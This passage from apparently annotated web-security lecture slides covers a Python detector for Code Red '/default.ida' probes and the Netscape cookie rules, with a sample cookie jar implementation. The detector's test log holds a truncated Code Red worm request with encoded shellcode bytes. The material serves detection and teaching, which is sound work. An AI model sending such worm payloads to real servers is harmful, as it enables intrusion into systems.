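# 58 = pop eax; 68 imm32 = push imm32. This is "%u6858%ucbd3%u7801" decoded.
POP_PUSH = bytes.fromhex("5868d3cb0178")


def parse_clf(line):
    m = CLF.match(line)
    if not m:
        raise ValueError("not a Common Log Format line: " + line[:40])
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def decode_u_escapes(query):
    """%u9090 -> b'\\x90\\x90', %u6858 -> b'\\x58\\x68': little-endian code units."""
    return b"".join(int(h, 16).to_bytes(2, "little") for h in U_ESCAPE.findall(query))


def classify_ida_probe(entry):
    """Describe a Code Red style request, or return None if the entry is not one."""
    path, _, query = entry["target"].partition("?")
    if path.lower() != "/default.ida" or "%u" not in query:
        return None
    filler = re.match(r"[XN]+", query)
    payload = decode_u_escapes(query)
    return {
        "host": entry["host"],
        "filler_len": len(filler.group(0)) if filler else 0,
        "filler_char": filler.group(0)[0] if filler else "",   # N: Code Red I, X: Code Red II
        "nop_bytes": payload.count(0x90),
        "pop_push_count": payload.count(POP_PUSH),
        # A 404 means the .ida mapping was absent, so this server was not
        # exploitable; the source host is still an infected scanner worth blocking.
        "server_was_vulnerable_path": entry["status"] != 404,
    }


def scan_log(lines):
    """Run every line through the parser and keep only the .ida probes."""
    return [r for r in (classify_ida_probe(parse_clf(l)) for l in lines) if r]


SAMPLE_LOG = [
    '12.27.8.161 - - [09/Sep/2001:04:07:07 -0400] "GET /default.ida?' + "X" * 40
    + '%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801'
    + '%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 278',
    '10.0.0.7 - - [09/Sep/2001:04:08:10 -0400] "GET /index.html HTTP/1.0" 200 1234',
    '10.0.0.9 - - [09/Sep/2001:04:09:00 -0400] "GET /default.ida?help HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The trailing "%u00=a" is deliberately left undecoded: it is not a complete four-digit escape, and a detector that anchors on the exact byte string of one variant misses the next one, which is why the rule keys on the .ida path plus %u escapes and reports the decoded payload as evidence rather than as the signature.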

46
Cookies (netscape cookie file)
  • Columns: host (URL invoking it) | isDomain | path in server | secure (https only) | expiration | name | value
  • www.airtime.co.uk | FALSE | /users/wysywig/ | FALSE | 968081837 | username | aaa
  • www.kbb.com | FALSE | /kb/ki.dll | FALSE | 9519638334 | zipcode | 15638
  • www.jcpenney.com | FALSE | /jcp | FALSE | 126632340 | ShopperManager6Fjcp | SHOPPERMANAGER6FJCP6EJSN34316NP100L1RURQ8HHF8MX34
  • www.buy.com | FALSE | /bc | FALSE | 128333061 | ShopperManager6F | SHOPPERMANAGER6FVQ8VSKLCWHSN000CM9C9JS7EDVL1
  • .doubleclick.net | TRUE | / | FALSE | 196034991340 | id | 39609560
  • .lycos.com | TRUE | / | FALSE | 161735952 | CyberTargetAnonymous | LYC000AFBAE77275BF6D2734BFCF563A16
  • .cmgi.com | TRUE | / | FALSE | 16173595634 | CyberGlobalAnonymous | CTG00017D567763405BF1FB34F8BFCD8B1D33
  • .webcrawler.com | TRUE | / | FALSE | 9342341600 | registered | no
  • .webcrawler.com | TRUE | / | FALSE | 9342341600 | UID | 210076B35C89A5C
  • .microsoft.com | TRUE | / | FALSE | 1065303482 | MC1 | GUID=DF160779710D118B1808006BB734F3F
  • .washingtonpost.com | TRUE | / | FALSE | 9342951343 | RMID | 98c81c8d3606d690
  • www.americanbible.org | FALSE | / | FALSE | 16308113498 | Int | 343 346 38 3 343 38 30 3 334 68 5 3
  • www.americanbible.org | FALSE | / | FALSE | 1630811600 | User Profile | F633C7686DA1FDBE85880034CDB11

47
Cookies (netscape cookie file)
  • Columns: host (URL invoking it) | isDomain | path in server | secure (https only) | expiration | name | value
  • www.antiquebooks.net | FALSE | / | FALSE | 938368777 | ulantique | 7-1-6-win-ns
  • classics.mit.edu | FALSE | / | FALSE | 934285095 | ICA_last_work | Homer.iliad
  • .jcpenny.com | TRUE | / | FALSE | 60516333438 | SITESERVER | ID=69bcf8f963456b19fffdf1ff19f
  • .amazon.com | TRUE | / | FALSE | 6086797993 | ubid-main | 06-6073435981034
  • nonprofit.guidestar.org | FALSE | / | FALSE | 613723673 | CFID | 95690
  • .google.com | TRUE | / | FALSE | 6134736834347 | ID | 34816dff31190ff80
  • .cmu.edu | TRUE | / | FALSE | 6051263400 | SITESERVER | ID=f8185834df6bac5f80a793a534c18
  • .waterhouse.com | TRUE | / | FALSE | 963585098 | accountno | 35869873
  • tracking.carprices.com | FALSE | / | FALSE | 9634234581 | PARTNER | CARPRICES
  • tracking.carprices.com | FALSE | / | FALSE | 9634234581 | MEMB_ID | -1
  • tracking.carprices.com | FALSE | / | FALSE | 9634234581 | USER | 10.8.1.35-1
  • tracking.carprices.com | FALSE | / | FALSE | 9634234578 | RETURN | VISITOR

48
Cookies: Server Writes to Browser
  • Set-Cookie: NAME=VALUE; expires=DATE; path=PATH; domain=DOMAIN_NAME; secure
  • NAME=VALUE
  • expires=DATE
  • domain=DOMAIN_NAME
  • The default value of domain is the host name of the server which generated the cookie response.
  • path=PATH
  • The path attribute is used to specify the subset of URLs in a domain for which the cookie is valid.
  • secure
  • If a cookie is marked secure, it will only be transmitted if the communications channel with the host is a secure one. Currently this means that secure cookies will only be sent to HTTPS (HTTP over SSL) servers. If secure is not specified, a cookie is considered safe to be sent in the clear over unsecured channels.

49
Browser Volunteers Cookie to Server!
  • If the browser visits the URL again, it volunteers the cookie name and contents to the URL
  • Cookie: NAME1=OPAQUE_STRING1; NAME2=OPAQUE_STRING2 ...
  • Server database can contain
  • Cookie name
  • Opaque string
  • Who (what IP/host/user/etc.) reported it
  • When

50
Cookie Source Code (www.mozilla.org)
  • host \t isDomain \t path \t xxx \t expires \t name \t cookie, from http://lxr.mozilla.org/seamonkey/source/extensions/cookie/nsCookie.cpp#2078
  • JavaScript interface! (fields shown in red on the slide are read-only)
  • Name (type): description
  • path (string): path the cookie applies to
  • domain (string): domain the cookie applies to
  • name (string): name of the cookie
  • value (string): value of the cookie
  • expires (string): date the cookie expires
  • url (string): url setting the cookie. TROJAN HORSE OPPORTUNITY!
  • isSecure (boolean): the cookie is sent over secure connections only
  • isDomain (boolean): the cookie has a domain attribute
  • prompt (boolean): user has configured prefs to throw the cookie confirm dialog
  • preference (int): the user's cookie acceptance value
  • accept() (method): allows the cookie to be set
  • reject() (method): causes the cookie not to be set
  • ask() (method): prompt a netlib confirmation dialog (happens during netlib set-cookie execution)

51
Cookies - Notes
  • Multiple Set-Cookie headers may appear in a single server response.
  • Same path but different names will add additional mappings.
  • A higher-level path value does not override more specific path mappings.
  • The expires attribute lets the client purge the mapping, but it is not required.
  • Number of cookies that a client can store at any one time:
  • 300 total cookies
  • 4 kilobytes per cookie
  • 20 cookies per server or domain.
  • A CGI script deletes a cookie by returning the same cookie (same name, path and domain) with an expired time.
  • This requirement makes it difficult for anyone but the originator of a cookie to delete a cookie.
  • The Set-Cookie response header should never be cached.
  • If a proxy server receives a response containing Set-Cookie, it should propagate the Set-Cookie header to the client, regardless of whether the response was 304 (Not Modified) or 200 (OK).
  • Similarly, if a client request contains a Cookie header, it should be forwarded through a proxy, even if a conditional If-Modified-Since request is being made.
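An added example (not the lecture's code and not Mozilla's) that implements the Netscape cookie rules from slides 46 to 51 in Python: loading the tab-separated cookie file, parsing Set-Cookie, deciding which cookies the browser volunteers for a URL (domain tail match, path prefix, secure flag, expiry), and deleting a cookie by re-sending it with an expired date. The cookie file content is constructed to mirror the shape of the one above, "now" is a fixed timestamp so the results are repeatable, and the 300/20 cookie limits are not enforced.

```python
# Added example: a minimal cookie jar following the Netscape cookie rules.
# Sample data is constructed; NOW is fixed so the behaviour is deterministic.
import calendar
import time
from urllib.parse import urlsplit

EXPIRES_FMT = "%a, %d-%b-%Y %H:%M:%S GMT"   # Netscape: Wdy, DD-Mon-YYYY HH:MM:SS GMT
NOW = 1_000_000_000                        # 2001-09-09 01:46:40 UTC, the lecture's era


def default_path(url_path):
    """Path of the document that set the cookie, up to its last '/'."""
    i = url_path.rfind("/")
    return url_path[:i] if i > 0 else "/"


class CookieJar:
    def __init__(self, now):
        self.now = now                      # Unix seconds, injected for repeatability
        self.cookies = {}                   # (host, path, name) -> cookie dict

    def _store(self, c):
        key = (c["host"], c["path"], c["name"])
        if c["expires"] is not None and c["expires"] <= self.now:
            self.cookies.pop(key, None)     # same name/path/domain, expired: deletion
        else:
            self.cookies[key] = c

    def load_netscape(self, text):
        """cookies.txt: host TAB isDomain TAB path TAB secure TAB expires TAB name TAB value"""
        for line in text.splitlines():
            if not line or line.startswith("#"):
                continue
            host, is_domain, path, secure, expires, name, value = line.split("\t")
            self._store(dict(host=host, is_domain=is_domain == "TRUE", path=path,
                             secure=secure == "TRUE", expires=int(expires),
                             name=name, value=value))

    def set_cookie(self, header, request_url):
        """Apply one Set-Cookie header received in a response from request_url."""
        parts = [p.strip() for p in header.split(";")]
        name, _, value = parts[0].partition("=")
        u = urlsplit(request_url)
        c = dict(host=u.hostname, is_domain=False, path=default_path(u.path),
                 secure=False, expires=None, name=name, value=value)
        for attr in parts[1:]:
            k, _, v = attr.partition("=")
            k, v = k.strip().lower(), v.strip()
            if k == "expires":
                c["expires"] = calendar.timegm(time.strptime(v, EXPIRES_FMT))
            elif k == "path":
                c["path"] = v
            elif k == "domain":
                d = v.lower() if v.startswith(".") else "." + v.lower()
                if not ("." + u.hostname).endswith(d):   # a host may only set its own domain
                    raise ValueError(f"{u.hostname} may not set cookies for {d}")
                c["host"], c["is_domain"] = d, True
            elif k == "secure":
                c["secure"] = True
        self._store(c)

    def cookies_for(self, url):
        """The Cookie header value the browser would volunteer for url ('' if none)."""
        u = urlsplit(url)
        host, sent = u.hostname, []
        for c in self.cookies.values():
            if c["expires"] is not None and c["expires"] <= self.now:
                continue
            if c["secure"] and u.scheme != "https":
                continue                    # secure cookies never go over plain HTTP
            if c["is_domain"]:
                if not ("." + host).endswith(c["host"]):
                    continue                # tail match: .acme.com covers www.acme.com
            elif host != c["host"]:
                continue
            if not (u.path or "/").startswith(c["path"]):
                continue                    # path is a prefix match
            sent.append(c)
        sent.sort(key=lambda c: -len(c["path"]))   # more specific paths first
        return "; ".join(f"{c['name']}={c['value']}" for c in sent)


COOKIES_TXT = "\n".join([                  # constructed, same layout as the lecture's file
    "# Netscape HTTP Cookie File (constructed for this example)",
    ".doubleclick.net\tTRUE\t/\tFALSE\t1960349913\tid\t39609560",
    "www.kbb.com\tFALSE\t/kb/\tFALSE\t1951963833\tzipcode\t15638",
    ".waterhouse.com\tTRUE\t/\tTRUE\t1963585098\taccountno\t35869873",
    "classics.mit.edu\tFALSE\t/\tFALSE\t934285095\tICA_last_work\tHomer.iliad",
])

if __name__ == "__main__":
    jar = CookieJar(now=NOW)
    jar.load_netscape(COOKIES_TXT)
    print(jar.cookies_for("http://ad.doubleclick.net/adj/page"))   # id=39609560
    print(repr(jar.cookies_for("http://www.waterhouse.com/")))     # '' (secure cookie, plain HTTP)
    jar.set_cookie("SESSION=abc; path=/; domain=.example.com; secure", "https://shop.example.com/cart")
    print(jar.cookies_for("https://www.example.com/"))            # SESSION=abc
```

The leading dot in the tail match is what keeps ".example.com" from also matching "notexample.com"; the "who may set which domain" check in set_cookie is the server-side counterpart. Both are rules a proxy or log-analysis tool that replays cookies has to reproduce, or it will volunteer the wrong cookies to the wrong hosts.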

52
Two Sides
  • Buyer wants things without exposing any
    information he discloses to any use other than
    what they MUST have to give him the things he
    wants. (Cryptophilia)
  • Seller wants to know as much about Buyer as
    possible because this gives him control over
    Buyers and therefore revenue. He can also sell
    this information (e.g., to advertisers). He wants
    unrestricted use of this information.
  • BUT, Buyers now collect information on Sellers
    and misuse that (The Sky is Falling.)
  • An Agreement is bilateral. The Internet can make
    possible agreements public and thereby expose
    both Sellers and Buyers to violations.